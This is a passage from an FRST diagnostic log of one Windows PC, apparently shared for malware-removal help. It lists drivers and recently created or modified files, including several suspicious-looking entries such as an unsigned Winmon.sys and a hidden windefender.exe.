R1 MpKslDrv; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{8DCDDCF9-B5F0-455F-9377-8A6F593207EF}\MpKslDrv.sys [58120 2019-11-25] (Microsoft Corporation -> Microsoft Corporation)
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys [17194584 2018-05-23] (NVIDIA Corporation -> NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30336 2019-05-10] (NVIDIA Corporation -> NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [69840 2019-04-17] (NVIDIA Corporation -> NVIDIA Corporation)
R3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [75600 2019-04-17] (NVIDIA Corporation -> NVIDIA Corporation)
S3 ptun0901; C:\WINDOWS\System32\drivers\ptun0901.sys [27136 2014-08-08] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R0 pwdrvio; C:\WINDOWS\System32\pwdrvio.sys [19152 2013-09-30] (MiniTool Solution Ltd -> )
S3 pwdspio; C:\WINDOWS\system32\pwdspio.sys [12504 2013-09-30] (MiniTool Solution Ltd -> )
R3 SbieDrv; C:\Program Files\Sandboxie\SbieDrv.sys [228616 2019-04-23] (Invincea, Inc. -> Sandboxie Holdings, LLC)
R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-19] (Bruce James -> Scarlet.Crush Productions)
R3 teVirtualMIDI64; C:\WINDOWS\system32\DRIVERS\teVirtualMIDI64.sys [41016 2015-07-12] (Tobias Erichsen -> Tobias Erichsen)
S3 USBAAPL64; C:\WINDOWS\System32\Drivers\usbaapl64.sys [54784 2016-12-21] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
R1 veracrypt; C:\WINDOWS\System32\drivers\veracrypt.sys [631200 2018-01-16] (IDRIX -> IDRIX)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [46472 2019-10-29] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [351968 2019-10-29] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [53984 2019-10-29] (Microsoft Windows -> Microsoft Corporation)
S3 Winmon; C:\WINDOWS\System32\drivers\Winmon.sys [9352 2019-11-24] (WDKTestCert Admin,131480495282941941 -> ) [File not signed]
R1 ZAM_Guard; C:\Windows\System32\drivers\zamguard64.sys [203680 2017-06-03] (Zemana Ltd. -> Zemana Ltd.)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) ===================

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-11-25 01:39 - 2019-11-25 01:39 - 000000000 ____D C:\Users\SR\AppData\Roaming\EpicNet Inc
2019-11-25 01:38 - 2019-11-25 01:38 - 000278344 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys
2019-11-25 01:38 - 2019-11-25 01:38 - 000216544 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamChameleon.sys
2019-11-25 01:38 - 2019-11-25 01:38 - 000003258 _____ C:\WINDOWS\system32\Tasks\csrss
2019-11-25 00:08 - 2019-11-25 00:08 - 000000872 _____ C:\Users\Public\Desktop\REAPER (x64).lnk
2019-11-25 00:08 - 2019-11-25 00:08 - 000000872 _____ C:\ProgramData\Desktop\REAPER (x64).lnk
2019-11-25 00:08 - 2019-11-25 00:08 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\REAPER (x64)
2019-11-24 20:00 - 2019-11-24 20:00 - 000081073 _____ C:\Users\SR\Desktop\Addition.txt
2019-11-24 20:00 - 2019-11-24 20:00 - 000060028 _____ C:\Users\SR\Desktop\FRST.txt
2019-11-24 19:50 - 2019-11-25 10:21 - 000000000 ____D C:\FRST
2019-11-24 18:57 - 2019-11-24 18:57 - 002079744 ____H C:\WINDOWS\windefender.exe
2019-11-24 18:57 - 2019-11-24 18:57 - 000023272 _____ (Windows ® Win 7 DDK provider) C:\WINDOWS\system32\Drivers\WinmonFS.sys
2019-11-24 18:57 - 2019-11-24 18:57 - 000009352 _____ C:\WINDOWS\system32\Drivers\Winmon.sys
2019-11-24 18:57 - 2019-11-24 18:57 - 000000000 ___HD C:\WINDOWS\rss
2019-11-24 00:05 - 2019-11-24 00:05 - 000000000 ____D C:\Users\SR\Documents\Joshua Bell Violin
2019-11-23 23:48 - 2019-11-24 00:35 - 000011305 _____ C:\Users\SR\Desktop\Named Notes for various VIs.xlsx
2019-11-23 22:00 - 2019-11-24 18:58 - 000009127 _____ C:\Users\SR\Desktop\New Microsoft Excel Worksheet.xlsx
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\Users\SR\AppData\Roaming\ExponentialAudio
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Exponential Audio
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\ExponentialAudio
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\AudioUTOPiA
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\Program Files\Common Files\vst3
2019-11-19 23:08 - 2019-11-19 23:09 - 000000000 ____D C:\Users\SR\Desktop\New folder
2019-11-19 21:06 - 2019-11-19 18:40 - 000514360 _____ C:\Users\SR\Desktop\Spitfire Solo Cello.nicnt
2019-11-19 18:32 - 2019-11-19 18:32 - 000000040 _____ C:\Users\SR\Desktop\Spitfire Solo Cello_info.nkc
2019-11-19 17:50 - 2019-11-19 17:50 - 000000000 _____ C:\Users\SR\Desktop\Spitfire Solo Cello_info.nkx
2019-11-18 13:04 - 2019-11-18 13:04 - 000001289 _____ C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FolderSize.lnk
2019-11-17 22:53 - 2019-11-17 22:53 - 000001090 _____ C:\Users\Public\Desktop\Kontakt 5.lnk
2019-11-17 22:53 - 2019-11-17 22:53 - 000001090 _____ C:\ProgramData\Desktop\Kontakt 5.lnk
2019-11-17 22:53 - 2019-11-17 22:53 - 000000000 __HDC C:\ProgramData\{06D838A8-9544-4D7D-808F-4ED187621BBB}
2019-11-17 22:49 - 2019-11-17 23:42 - 000000000 ____D C:\Users\SR\Desktop\old Native Instruments folder
2019-11-17 21:04 - 2019-11-17 21:04 - 000000000 ____D C:\Users\Public\Documents\NI Resources
2019-11-17 21:04 - 2019-11-17 21:04 - 000000000 ____D C:\ProgramData\Documents\NI Resources
2019-11-16 00:54 - 2019-11-16 00:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2019-11-14 14:19 - 2019-11-14 14:19 - 000051024 _____ (Dropbox, Inc.) C:\WINDOWS\system32\DbxSvc.exe
2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-stable.sys
2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-dev.sys
2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-canary.sys
2019-11-11 14:05 - 2019-11-11 14:05 - 000000000 ____D C:\Users\SR\AppData\Roaming\Subversion
2019-11-11 14:05 - 2019-11-11 14:05 - 000000000 ____D C:\Users\SR\.android
2019-11-11 14:04 - 2019-11-11 14:04 - 000000000 ____D C:\Users\SR\Documents\Embarcadero
2019-11-11 13:49 - 2019-11-11 13:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Embarcadero InterBase XE7
2019-11-11 13:49 - 2016-02-25 19:35 - 001287496 _____ (Embarcadero Technologies, Inc.) C:\WINDOWS\SysWOW64\gds32.dll
2019-11-11 13:49 - 2016-02-25 19:35 - 000031560 _____ (Embarcadero Technologies, Inc.) C:\WINDOWS\SysWOW64\ibxml.dll
2019-11-11 13:49 - 2016-02-25 18:57 - 001766728 _____ (Embarcadero Technologies, Inc.) C:\WINDOWS\system32\ibclient64.dll
2019-11-11 13:49 - 2016-02-25 18:57 - 000034632 _____ (Embarcadero Technologies, Inc.) C:\WINDOWS\system32\ibxml64.dll
2019-11-11 13:48 - 2019-11-11 13:48 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java Development Kit
2019-11-11 13:23 - 2019-11-11 13:36 - 000000000 ____D C:\Users\Public\Documents\Embarcadero
2019-11-11 13:23 - 2019-11-11 13:36 - 000000000 ____D C:\ProgramData\Documents\Embarcadero
2019-11-11 00:59 - 2019-11-11 14:22 - 000000000 ____D C:\Users\SR\AppData\Roaming\Embarcadero
2019-11-11 00:59 - 2019-11-11 14:22 - 000000000 ____D C:\ProgramData\Embarcadero
2019-11-11 00:57 - 2019-11-11 00:57 - 000000000 ____D C:\Users\SR\AppData\Local\PackageAware
2019-11-10 23:04 - 2019-11-10 23:04 - 000000000 ____D C:\wxWidgets-3.0.4
2019-11-10 23:04 - 2019-11-10 23:04 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\wxWidgets 3.0.4
2019-11-10 22:32 - 2019-11-10 23:12 - 000000000 ____D C:\Users\SR\Documents\srCodeBlock
2019-11-10 22:27 - 2019-11-11 14:28 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CodeBlocks
2019-11-10 22:27 - 2019-11-10 23:18 - 000000000 ____D C:\Users\SR\AppData\Roaming\CodeBlocks
2019-11-10 20:56 - 2019-11-10 20:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Visual Studio 2017 Tools for Unity
2019-11-10 20:55 - 2019-11-10 20:55 - 000000000 ____D C:\Program Files (x86)\Windows Phone Kits
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\ProgramData\Windows App Certification Kit
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Kits
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\Program Files\Application Verifier
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\Program Files (x86)\Application Verifier
2019-11-10 20:40 - 2018-04-11 06:46 - 000402944 _____ (Windows ® Win 7 DDK provider) C:\WINDOWS\system32\DXCpl.exe
2019-11-10 20:40 - 2018-04-11 06:44 - 000350208 _____ (Microsoft Corporation) C:\WINDOWS\system32\perf_gputiming.dll
2019-11-10 20:40 - 2018-04-11 05:12 - 000380416 _____ (Windows ® Win 7 DDK provider) C:\WINDOWS\SysWOW64\DXCpl.exe
2019-11-10 20:40 - 2018-04-11 05:11 - 000271360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\perf_gputiming.dll
2019-11-10 20:40 - 2018-04-10 21:41 - 000095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\DxToolsReportGenerator.dll
2019-11-10 20:40 - 2018-04-10 21:37 - 000095744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DxToolsReportGenerator.dll
2019-11-10 20:40 - 2018-04-10 21:15 - 017871360 _____ (Microsoft Corporation) C:\WINDOWS\system32\DXCaptureReplay.dll
2019-11-10 20:40 - 2018-04-10 21:15 - 014058496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DXCaptureReplay.dll
2019-11-10 20:40 - 2018-04-10 21:11 - 000061952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VSD3DWARPDebug.dll
2019-11-10 20:40 - 2018-04-10 21:11 - 000041984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VsGraphicsProxyStub.dll
2019-11-10 20:40 - 2018-04-10 21:10 - 000142336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DXToolsMonitor.dll
2019-11-10 20:40 - 2018-04-10 21:10 - 000118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DXToolsReporting.dll
2019-11-10 20:40 - 2018-04-10 21:09 - 000238592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DXGIDebug.dll
2019-11-10 20:40 - 2018-04-10 21:09 - 000091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\VsGraphicsProxyStub.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 004529664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VsGraphicsDesktopEngine.exe
2019-11-10 20:40 - 2018-04-10 21:08 - 003632640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VsGraphicsRemoteEngine.exe
2019-11-10 20:40 - 2018-04-10 21:08 - 002249728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d12SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 001100288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d11_3SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 000466944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1debug3.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 000334848 _____ (Microsoft Corporation) C:\WINDOWS\system32\DXGIDebug.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 000078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\VSD3DWARPDebug.dll
2019-11-10 20:40 - 2018-04-10 21:07 - 001359872 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d11_3SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:07 - 000221184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VsGraphicsExperiment.dll
2019-11-10 20:40 - 2018-04-10 21:07 - 000176128 _____ (Microsoft Corporation) C:\WINDOWS\system32\DXToolsReporting.dll
2019-11-10 20:40 - 2018-04-10 21:06 - 004858880 _____ (Microsoft Corporation) C:\WINDOWS\system32\VsGraphicsRemoteEngine.exe
2019-11-10 20:40 - 2018-04-10 21:06 - 001500160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DXToolsOfflineAnalysis.dll
2019-11-10 20:40 - 2018-04-10 21:06 - 000921088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DXCap.exe
2019-11-10 20:40 - 2018-04-10 21:06 - 000539136 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1debug3.dll
2019-11-10 20:40 - 2018-04-10 21:06 - 000124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VsGraphicsCapture.dll
2019-11-10 20:40 - 2018-04-10 21:05 - 005746688 _____ (Microsoft Corporation) C:\WINDOWS\system32\VsGraphicsDesktopEngine.exe
2019-11-10 20:40 - 2018-04-10 21:05 - 002000896 _____ (Microsoft Corporation) C:\WINDOWS\system32\DXToolsOfflineAnalysis.dll
2019-11-10 20:40 - 2018-04-10 21:05 - 000164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\VsGraphicsCapture.dll
2019-11-10 20:40 - 2018-04-10 21:04 - 000189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\DXToolsMonitor.dll
2019-11-10 20:40 - 2018-04-10 21:03 - 002818560 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d12SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:02 - 001178624 _____ (Microsoft Corporation) C:\WINDOWS\system32\DXCap.exe
2019-11-10 20:40 - 2018-04-10 21:02 - 000286720 _____ (Microsoft Corporation) C:\WINDOWS\system32\VsGraphicsExperiment.dll
2019-11-10 20:36 - 2019-11-10 20:36 - 000000000 ____D C:\Program Files (x86)\NuGet
2019-11-10 20:35 - 2019-11-10 20:35 - 000000000 ____D C:\Users\SR\.dotnet
2019-11-10 20:35 - 2019-11-10 20:35 - 000000000 ____D C:\Program Files\dotnet
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\3082
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\2052
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\1055
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\1049
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\1046
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\1045
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\1042
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\1041
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\1040
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\1036
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\1033
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\1031
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\1029
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\SysWOW64\1028
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\3082
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\2052
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\1055
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\1049
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\1046
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\1045
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\1042
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\1041
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\1040
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\1036
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\1033
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\1031
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\1029
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\WINDOWS\system32\1028
2019-11-10 20:34 - 2019-11-10 20:34 - 000001843 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Blend for Visual Studio 2017.lnk
2019-11-10 20:34 - 2019-11-10 20:34 - 000000000 ____D C:\Program Files (x86)\Entity Framework Tools
2019-11-10 20:33 - 2019-11-10 20:33 - 000001499 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio 2017.lnk
2019-11-05 18:52 - 2019-11-05 18:52 - 000000000 ____D C:\Users\SR\AppData\Local\Viber
2019-10-28 22:34 - 2019-10-28 22:34 - 000000000 ____D C:\Users\SR\Desktop\FIFA-19---Career-Mode-Cheat-Table-master
2019-10-26 12:03 - 2019-10-26 12:03 - 000002149 _____ C:\Users\SR\Desktop\FTX GLOBAL VECTOR Configuration Tool.exe - Shortcut.lnk

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-11-25 10:21 - 2019-08-14 11:29 - 000104013 _____ C:\WINDOWS\ZAM_Guard.krnl.trace
2019-11-25 10:18 - 2018-06-02 15:16 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2019-11-25 10:18 - 2018-04-12 01:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2019-11-25 01:43 - 2017-05-25 17:31 - 000000000 ____D C:\Users\SR\AppData\LocalLow\Mozilla
2019-11-25 01:42 - 2018-06-02 15:28 - 001464880 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2019-11-25 01:42 - 2018-06-02 13:32 - 000550540 _____ C:\WINDOWS\system32\perfh008.dat
2019-11-25 01:42 - 2018-06-02 13:32 - 000088248 _____ C:\WINDOWS\system32\perfc008.dat
2019-11-25 01:42 - 2018-04-12 01:36 - 000000000 ____D C:\WINDOWS\INF
2019-11-25 01:40 - 2018-06-01 16:16 - 000000000 ____D C:\ProgramData\NVIDIA
2019-11-25 01:38 - 2019-08-11 17:31 - 000153312 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae64.sys
2019-11-25 01:38 - 2019-08-11 17:31 - 000020936 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamElam.sys
2019-11-25 01:38 - 2019-08-11 17:31 - 000002024 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2019-11-25 01:38 - 2019-08-11 17:31 - 000002024 _____ C:\ProgramData\Desktop\Malwarebytes.lnk
2019-11-25 01:38 - 2018-06-06 18:07 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2019-11-25 01:38 - 2018-06-02 15:24 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2019-11-25 01:38 - 2017-11-23 11:26 - 000000000 ____D C:\Users\SR\AppData\Local\cache
2019-11-25 01:38 - 2017-10-10 18:36 - 000000000 ____D C:\Users\SR\Documents\DesktopReminder
2019-11-25 01:38 - 2017-06-15 17:44 - 000000000 ____D C:\ProgramData\Reprise
2019-11-25 01:35 - 2018-04-11 23:04 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2019-11-25 01:33 - 2017-08-27 21:09 - 000000000 ____D C:\Users\SR\AppData\LocalLow\Temp
2019-11-25 01:28 - 2018-06-02 15:24 - 000000000 ____D C:\WINDOWS\system32\Tasks\JumpingBytes
2019-11-25 00:39 - 2017-05-26 14:22 - 000000000 ____D C:\Users\SR\AppData\Local\CrashDumps
2019-11-25 00:08 - 2017-05-26 16:40 - 000000000 ____D C:\Program Files\REAPER (x64)
2019-11-24 23:31 - 2018-06-02 15:19 - 000000000 ____D C:\Users\SR
2019-11-24 23:30 - 2018-10-19 19:31 - 000000000 ____D C:\WINDOWS\Minidump
2019-11-24 23:30 - 2016-09-24 20:11 - 000355058 ____N C:\WINDOWS\Minidump\112419-10000-01.dmp
2019-11-24 18:57 - 2017-06-12 13:15 - 000011914 __RSH C:\ProgramData\ntuser.pol
2019-11-24 18:37 - 2017-05-26 12:04 - 000000000 ____D C:\Users\SR\AppData\Roaming\qBittorrent
2019-11-24 14:47 - 2017-11-04 13:39 - 000013336 _____ C:\WINDOWS\system32\BMXStateBkp-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 14:47 - 2017-11-04 13:39 - 000013336 _____ C:\WINDOWS\system32\BMXState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 14:47 - 2017-11-04 13:39 - 000011564 _____ C:\WINDOWS\system32\DVCState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 14:47 - 2017-11-04 13:39 - 000001224 _____ C:\WINDOWS\system32\BMXCtrlState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 14:47 - 2017-11-04 13:39 - 000001224 _____ C:\WINDOWS\system32\BMXBkpCtrlState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 10:51 - 2018-04-12 01:38 - 000000000 ____D C:\WINDOWS\AppReadiness
2019-11-23 18:35 - 2018-04-12 01:38 - 000000000 ___HD C:\Program Files\WindowsApps
2019-11-22 21:41 - 2017-05-26 15:08 - 000002096 _____ C:\WINDOWS\Sandboxie.ini
2019-11-21 20:12 - 2019-02-18 21:23 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2019-11-21 19:49 - 2017-05-26 16:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Native Instruments
2019-11-21 17:13 - 2019-07-15 15:01 - 000000000 ____D C:\Users\SR\AppData\Roaming\ViberPC
2019-11-21 01:11 - 2018-04-12 01:38 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2019-11-19 23:10 - 2017-05-26 16:56 - 000000000 ____D C:\Program Files\Native Instruments
2019-11-19 11:34 - 2019-03-02 14:15 - 000634880 _____ C:\Users\SR\Documents\MeNew_v2.fmp12
2019-11-18 17:19 - 2017-09-08 20:54 - 000000000 ____D C:\Users\SR\Documents\REAPER Media
2019-11-18 15:43 - 2019-10-19 15:18 - 000018960 _____ (Logitech, Inc.) C:\WINDOWS\system32\Drivers\LNonPnP.sys
2019-11-18 14:07 - 2019-10-03 18:47 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2019-11-18 14:07 - 2019-10-03 18:47 - 000000000 ___HD C:\ProgramData\Documents\AdobeGCData
2019-11-17 21:04 - 2017-09-08 20:57 - 000027684 _____ C:\Users\SR\Desktop\sc3.tmp
2019-11-17 15:25 - 2017-05-26 12:41 - 000000000 ____D C:\Users\SR\Documents\Camtasia Studio
2019-11-17 13:17 - 2018-01-16 19:24 - 000000000 ____D C:\Users\SR\AppData\Roaming\vlc
2019-11-16 00:54 - 2018-01-03 12:14 - 000000000 ____D C:\Program Files (x86)\Dropbox
2019-11-16 00:19 - 2018-11-26 20:34 - 000006144 _____ C:\Users\SR\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2019-11-14 19:23 - 2017-09-08 22:18 - 000000000 ____D C:\Users\SR\AppData\Roaming\Mp3tag
2019-11-14 13:00 - 2018-06-02 15:24 - 000003374 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3967059023-4107875624-2872843465-1001
2019-11-14 13:00 - 2018-06-02 15:19 - 000002403 _____ C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2019-11-14 13:00 - 2017-05-25 17:10 - 000000000 ___RD C:\Users\SR\OneDrive
2019-11-14 12:13 - 2018-04-12 15:16 - 000000000 ____D C:\Users\SR\AppData\Local\PlaceholderTileLogoFolder
2019-11-13 15:13 - 2018-02-14 15:35 - 000000000 ____D C:\Users\SR\AppData\Local\Packages
2019-11-13 13:02 - 2017-05-25 19:45 - 000748816 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2019-11-12 12:45 - 2018-06-02 15:16 - 005163280 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2019-11-11 17:40 - 2018-01-03 12:23 - 000000000 ___RD C:\Users\SR\Dropbox
2019-11-11 15:38 - 2017-08-27 19:44 - 000000000 ____D C:\Users\SR\AppData\Roaming\Visual Studio Setup
2019-11-11 13:49 - 2015-07-10 13:04 - 000017535 _____ C:\WINDOWS\system32\Drivers\etc\services
2019-11-11 13:48 - 2017-09-07 13:40 - 000000000 ____D C:\Users\SR\.oracle_jre_usage
2019-11-11 13:48 - 2017-05-26 16:29 - 000000000 ____D C:\Program Files\Java
2019-11-11 13:48 - 2017-05-25 21:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2019-11-10 20:52 - 2017-08-27 19:49 - 000000000 ____D C:\Program Files (x86)\Microsoft SDKs
2019-11-10 20:48 - 2017-06-30 19:12 - 000000000 ____D C:\ProgramData\Package Cache
2019-11-10 20:46 - 2018-04-12 01:30 - 000000000 ____D C:\WINDOWS\CbsTemp
2019-11-10 20:34 - 2017-08-27 19:44 - 000000000 ____D C:\Program Files (x86)\Microsoft Visual Studio
2019-11-10 20:34 - 2017-06-11 17:39 - 000000000 ____D C:\Program Files (x86)\Microsoft SQL Server
2019-11-10 20:33 - 2018-06-02 13:14 - 000000000 ____D C:\Program Files (x86)\MSBuild
2019-11-10 20:33 - 2018-04-12 01:38 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2019-11-10 20:33 - 2017-08-27 19:49 - 000000000 ____D C:\Program Files (x86)\Windows Kits
2019-11-10 16:31 - 2019-01-08 14:50 - 000000000 ____D C:\Users\SR\AppData\Roaming\temp_info_collect
2019-11-10 16:30 - 2019-01-08 14:50 - 000000000 ____D C:\ProgramData\EMM
2019-11-09 19:38 - 2017-08-27 20:07 - 000000000 ____D C:\Users\SR\Documents\Visual Studio 2017
2019-11-09 19:32 - 2017-08-27 19:44 - 000001402 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio Installer.lnk
2019-11-08 14:06 - 2019-10-09 15:00 - 000000000 ____D C:\Users\SR\Desktop\Unused Mods
2019-11-08 12:53 - 2017-05-27 13:55 - 000000000 ____D C:\Users\SR\Documents\Flight Simulator X Files
2019-11-03 17:55 - 2017-05-25 17:30 - 000000000 ____D C:\Program Files\Mozilla Firefox
2019-11-03 17:55 - 2017-05-25 17:30 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2019-11-03 13:05 - 2017-11-15 14:46 - 000001275 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2019-10-31 10:47 - 2019-04-17 23:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IconShepherd
2019-10-31 10:47 - 2019-04-17 23:11 - 000000000 ____D C:\Program Files\IconShepherd
2019-10-29 10:07 - 2018-03-01 10:19 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
